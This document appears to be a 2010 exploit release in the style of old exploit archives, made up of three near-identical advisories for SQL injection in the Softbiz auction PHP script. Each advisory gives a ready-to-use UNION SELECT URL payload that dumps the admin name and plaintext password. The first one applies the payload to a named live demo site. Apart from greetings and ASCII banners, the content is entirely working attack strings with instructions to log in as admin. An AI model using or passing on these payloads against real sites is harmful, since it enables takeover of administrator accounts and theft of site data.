----------------------------Information------------------------------------------------ +Name : softbiz auktios script sql injection view_feedback.php +Autor : Easy Laster +Date : 24.02.2010 +Script : softbiz auktios script +Download : ----- +Demo : http://ezpips.com/ +Price : 99$ +Language :PHP +Discovered by Easy Laster +Security Group 4004-Security-Project +Greetz to Team-Internet ,Underground Agents +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Damian. --------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ |_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| |___| |___| ---------------------------------------------------------------------------------------- +Vulnerability : www.site.com/auktionscript/view_feedback.php?id= +Exploitable : www.site.com/auktionscriptview_feedback.php?id=null+union+select+1,2, 3,4,5,6,7,8,9,10,concat(admin_name,0x3a,pwd),12,13,14,15,16,17,18+from+sbauctions_admin# The Password save in Plaintext you must login in www.site.com/auktionscript/admin/ ----------------------------------------------------------------------------------------- http://ezpips.com/view_feedback.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,concat%28admin_name,0x3a,pwd%29,12,13,14,15,16,17,18+from+sbauctions_admin#----------------------------Information------------------------------------------------ +Name : softbiz auktios script sql injection view_items.php +Autor : Easy Laster +Date : 24.02.2010 +Script : softbiz auktios script +Download : ----- +Demo : http://ezpips.com/ +Price : 99$ +Language :PHP +Discovered by Easy Laster +Security Group 4004-Security-Project +Greetz to Team-Internet ,Underground Agents +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Damian. --------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ |_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| |___| |___| ---------------------------------------------------------------------------------------- +Vulnerability : www.site.com/auktionscript/view_items.php?id= +Exploitable : www.site.com/auktionscript/view_items.php?id=null+union+select+1,2, 3,4,5,6,7,8,9,10,concat(admin_name,0x3a,pwd),12,13,14,15,16,17,18+from+sbauctions_admin# The Password save in Plaintext you must login in www.site.com/auktionscript/admin/ ----------------------------------------------------------------------------------------- ----------------------------Information------------------------------------------------ +Name : softbiz auktios script sql injection store_info.php +Autor : Easy Laster +Date : 24.02.2010 +Script : softbiz auktios script +Download : ----- +Demo : http://ezpips.com/ +Price : 99$ +Language :PHP +Discovered by Easy Laster +Security Group 4004-Security-Project +Greetz to Team-Internet ,Underground Agents +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Damian. --------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ |_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| |___| |___| ---------------------------------------------------------------------------------------- +Vulnerability : www.site.com/auktionscript/store_info.php?id= +Exploitable : www.site.com/auktionscript/store_info.php?id=null+union+select+1,2,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(admin_name,0x3a,pwd),18+from+sbauctions_admin# The Password save in Plaintext you must login in www.site.com/auktionscript/admin/ -----------------------------------------------------------------------------------------